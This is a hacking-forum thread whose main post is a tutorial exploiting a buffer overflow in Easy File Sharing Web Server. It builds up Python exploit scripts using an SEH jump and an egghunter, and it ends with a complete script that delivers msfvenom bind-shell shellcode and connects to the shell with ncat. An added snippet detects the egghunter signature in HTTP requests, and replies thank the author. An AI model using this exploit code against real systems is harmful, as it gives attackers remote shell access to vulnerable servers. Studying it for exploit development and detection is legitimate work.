
ch3rn0byl
Egghunting Sorcery!!
« on: July 28, 2016, 01:58:15 AM »
Videos up! Just head to the link if you would like to watch it :)
Also, you can find this post on my site too: http://ch3rn0byl.com/egghunting-sorcery/

Knowing thy Egghunter
What does it exactly do though?
Reconstructing our Exploit

Earlier, I mentioned we were going to be working with the vulnerable software from my last post, which was Easy File Sharing Web Server. Let's pick apart the previous exploit so we can implement our egghunter and you can see it in action.

Code:
from socket import socket, AF_INET, SOCK_STREAM

host = '192.168.126.142'

crash = "A" * 4061                    # Will not change. This is what crashes our app
crash += "\xeb\x06\x90\x90"           # Does not change either. This is what jumps to our egghunter
crash += "\xff\x28\x02\x10"           # Will not change either. This is our P/P/R
crash += "D" * (5500 - 4061 - 8)      # Our junk that we can leave alone as well

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
except:
        print '[!] Whoops!! Something went wrong?'
Code:
from socket import socket, AF_INET, SOCK_STREAM

host = '192.168.126.142'

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061                                     
crash += "\xeb\x06\x90\x90"                           
crash += "\xff\x28\x02\x10"                           
crash += egghunter                                     # Our added egghunter of hive
crash += "D" * (5500 - 4061 - 8 - len(egghunter))      # Taking account of our egghunter's length

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
except:
        print '[!] Whoops!! Something went wrong?'
Code:
from socket import socket, AF_INET, SOCK_STREAM

host = '192.168.126.142'

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061                                     
crash += "\xeb\x06\x90\x90"                           
crash += "\xff\x28\x02\x10"                           
crash += egghunter                                     
crash += "D" * (5500 - 4061 - 8 - len(egghunter))     

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += 'E' * 800

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
except:
        print '[!] Whoops!! Something went wrong?'


Awesome!! Look at that sweet, sweet space to insert any type of payload our little heart desires!

Code:
dev@ubuntu:~# msfvenom -p windows/shell_bind_tcp LPORT=54321 -n 20 -f python -a x86 --platform windows -b '\x00' -v rekt
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai chosen with final size 355
Successfully added NOP sled from x86/single_byte
Payload size: 375 bytes
rekt =  ""
--snipped--
Code:
#!/usr/bin/python

from socket import socket, AF_INET, SOCK_STREAM
from sys import argv
from struct import pack
from time import sleep
from subprocess import call

host = argv[1]

rekt =  ""
rekt += "\x93\x93\x48\xf5\x93\x93\x90\xf9\x90\x37\x4a\x48\x90"
rekt += "\x99\x9b\x37\x98\x9f\xfc\xd6\xbd\x71\xab\x9a\xbc\xdb"
rekt += "\xd0\xd9\x74\x24\xf4\x5f\x29\xc9\xb1\x53\x31\x6f\x12"
rekt += "\x83\xef\xfc\x03\x1e\xa5\x78\x49\x1c\x51\xfe\xb2\xdc"
rekt += "\xa2\x9f\x3b\x39\x93\x9f\x58\x4a\x84\x2f\x2a\x1e\x29"
rekt += "\xdb\x7e\x8a\xba\xa9\x56\xbd\x0b\x07\x81\xf0\x8c\x34"
rekt += "\xf1\x93\x0e\x47\x26\x73\x2e\x88\x3b\x72\x77\xf5\xb6"
rekt += "\x26\x20\x71\x64\xd6\x45\xcf\xb5\x5d\x15\xc1\xbd\x82"
rekt += "\xee\xe0\xec\x15\x64\xbb\x2e\x94\xa9\xb7\x66\x8e\xae"
rekt += "\xf2\x31\x25\x04\x88\xc3\xef\x54\x71\x6f\xce\x58\x80"
rekt += "\x71\x17\x5e\x7b\x04\x61\x9c\x06\x1f\xb6\xde\xdc\xaa"
rekt += "\x2c\x78\x96\x0d\x88\x78\x7b\xcb\x5b\x76\x30\x9f\x03"
rekt += "\x9b\xc7\x4c\x38\xa7\x4c\x73\xee\x21\x16\x50\x2a\x69"
rekt += "\xcc\xf9\x6b\xd7\xa3\x06\x6b\xb8\x1c\xa3\xe0\x55\x48"
rekt += "\xde\xab\x31\xbd\xd3\x53\xc2\xa9\x64\x20\xf0\x76\xdf"
rekt += "\xae\xb8\xff\xf9\x29\xbe\xd5\xbe\xa5\x41\xd6\xbe\xec"
rekt += "\x85\x82\xee\x86\x2c\xab\x64\x56\xd0\x7e\x10\x5e\x77"
rekt += "\xd1\x07\xa3\xc7\x81\x87\x0b\xa0\xcb\x07\x74\xd0\xf3"
rekt += "\xcd\x1d\x79\x0e\xee\xf5\x4b\x87\x08\x9f\xbb\xc1\x83"
rekt += "\x37\x7e\x36\x1c\xa0\x81\x1c\x34\x46\xc9\x76\x83\x69"
rekt += "\xca\x5c\xa3\xfd\x41\xb3\x77\x1c\x56\x9e\xdf\x49\xc1"
rekt += "\x54\x8e\x38\x73\x68\x9b\xaa\x10\xfb\x40\x2a\x5e\xe0"
rekt += "\xde\x7d\x37\xd6\x16\xeb\xa5\x41\x81\x09\x34\x17\xea"
rekt += "\x89\xe3\xe4\xf5\x10\x61\x50\xd2\x02\xbf\x59\x5e\x76"
rekt += "\x6f\x0c\x08\x20\xc9\xe6\xfa\x9a\x83\x55\x55\x4a\x55"
rekt += "\x96\x66\x0c\x5a\xf3\x10\xf0\xeb\xaa\x64\x0f\xc3\x3a"
rekt += "\x61\x68\x39\xdb\x8e\xa3\xf9\xeb\xc4\xe9\xa8\x63\x81"
rekt += "\x78\xe9\xe9\x32\x57\x2e\x14\xb1\x5d\xcf\xe3\xa9\x14"
rekt += "\xca\xa8\x6d\xc5\xa6\xa1\x1b\xe9\x15\xc1\x09"

egghunter = ''
egghunter += '\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c'
egghunter += '\x05\x5a\x74\xef\xb8\x68\x69\x76\x65\x8b\xfa\xaf\x75'
egghunter += '\xea\xaf\x75\xe7\xff\xe7'

crash = "A" * 4061
crash += pack('<L', 0x909006eb)
crash += pack('<L', 0x10019ce3)
crash += egghunter
crash += "D" * (5500 - 4061 - 8 - len(egghunter))

payload = 'GET {} HTTP/1.0\r\n\r\n'.format(crash)
payload += 'hivehive'
payload += rekt
payload += 'E' * (800 - len(rekt))

print '[+] Trying to exploit {}...'.format(host)

try:
        s = socket(AF_INET, SOCK_STREAM)
        s.connect((host, 80))
        print '[+] Sending payload...'
        s.send(payload)
        s.close()
        print '[+] Trying to connect to target...\n'
        try:
                sleep(2)
                call(['ncat', host, '54321'])
        except:
                print '[!] Whoops!! Something went wrong?'
except:
        print '[!] Whoops!! Something went wrong?'
finally:
        print '\n[+] I <3 SHELLS'

« Last Edit: July 29, 2016, 06:06:47 PM by ch3rn0byl »
The quieter you become, the more you are unlikely to sound stupid.
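The egghunter stub and the doubled "hive" tag in the scripts above also make a usable detection signature. Added example, not part of the original post: a Python 3 inspector that flags a raw HTTP request carrying the int 0x2e egghunter prologue, recovers the 4-byte tag from the search loop, and checks whether the matching egg is present; the request-line threshold and both sample requests are constructed for this example.

```python
import re
from typing import List

# Egghunter bytes from the thread, split at the search loop so the 4-byte tag
# can be captured. Prologue: or dx, 0x0fff; inc edx; push edx; push 2; pop eax;
# int 0x2e; cmp al, 5; pop edx; jz back. Used here purely as a detection signature.
HUNTER_HEAD = b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef"
# Search loop: mov eax, <tag>; mov edi, edx; scasd; jnz; scasd; jnz; jmp edi.
HUNTER_TAIL = re.compile(
    rb"\xb8(?P<tag>.{4})\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7", re.DOTALL
)
# Threshold chosen for this example (not from the thread); tune per server.
MAX_REQUEST_LINE = 2048


def inspect_request(raw: bytes) -> List[str]:
    """Return findings for one raw HTTP request (request line, headers, body)."""
    findings = []
    request_line = raw.split(b"\r\n", 1)[0]
    if len(request_line) > MAX_REQUEST_LINE:
        findings.append(f"oversized request line ({len(request_line)} bytes)")
    if HUNTER_HEAD in raw:
        findings.append("egghunter int 0x2e prologue present")
    for m in HUNTER_TAIL.finditer(raw):
        tag = m.group("tag")
        findings.append(f"egghunter search loop present, tag={tag!r}")
        if tag * 2 in raw:  # the hunter looks for the tag twice, back to back
            findings.append(f"matching egg {tag * 2!r} present in request")
    return findings


# Constructed samples: the shape of the thread's third script (junk shortened),
# with the egg and its filler placed after the headers, versus a benign request.
EGGHUNTER = HUNTER_HEAD + b"\xb8hive\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
SAMPLE_ATTACK = (
    b"GET " + b"A" * 4061 + EGGHUNTER + b"D" * 100 + b" HTTP/1.0\r\n\r\n"
    + b"hivehive" + b"E" * 800
)
SAMPLE_BENIGN = b"GET /index.html HTTP/1.0\r\nHost: example.test\r\n\r\n"

if __name__ == "__main__":
    for name, req in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(name, inspect_request(req) or ["no findings"])
```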

H4v0K
Re: Egghunting Sorcery!!
« Reply #1 on: July 28, 2016, 04:06:35 AM »
video video video video video video :P. I'm just gonna have to copy all this, I'll never remember it till I start doing them.. thanks for posting

Grey-Matter
Re: Egghunting Sorcery!!
« Reply #2 on: July 28, 2016, 09:11:59 AM »
Exactly what h4v said. Thanks for bringing some more cool shit back for us to learn like always. I'll definitely have to put a day aside to sit down and try to grasp this. I'll post again after I've gone through it. Keep it up brotha!!!!!!! :)

ch3rn0byl
Re: Egghunting Sorcery!!
« Reply #3 on: July 28, 2016, 06:23:28 PM »

Malachai
Re: Egghunting Sorcery!!
« Reply #4 on: July 30, 2016, 09:11:25 PM »
That was a pretty cool video you made. Great job
** Don't judge me! **

*//
  Hope that Firewall works because you're SCREWED
  //*